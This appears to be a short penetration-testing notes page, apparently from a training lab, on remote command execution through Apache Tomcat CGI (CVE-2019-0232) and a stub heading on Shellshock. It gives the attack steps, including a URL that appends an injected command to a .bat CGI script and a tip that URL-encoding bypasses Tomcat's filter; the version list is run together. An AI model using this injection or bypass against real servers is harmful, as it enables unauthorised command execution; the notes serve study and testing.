Tomcat CGI
CVE-2019-0232
Tomcat CGI vulnerable versions to Remote Command execution
9.0.0.M19.0.178.5.08.5.397.0.07.0.9
Steps to reproduce
Use nmap to enumerate specific versions are running on the server
Find the CGI-Script:
http://10.129.204.227:8080/cgi/FUZZ.cmdhttp://10.129.204.227:8080/cgi/FUZZ.bat
Execute the command:
http://10.129.204.227:8080/cgi/welcome.bat?&<command>
💡
Apache Tomcat introduced a patch that utilises a regular expression to prevent the use of special characters. However, the filter can be bypassed by URL-encoding the payload.
Shellshock via CGI
It is a security flaw in the Bash shell (GNU Bash up until version 4.3)
Check if is vulnerable
Last updated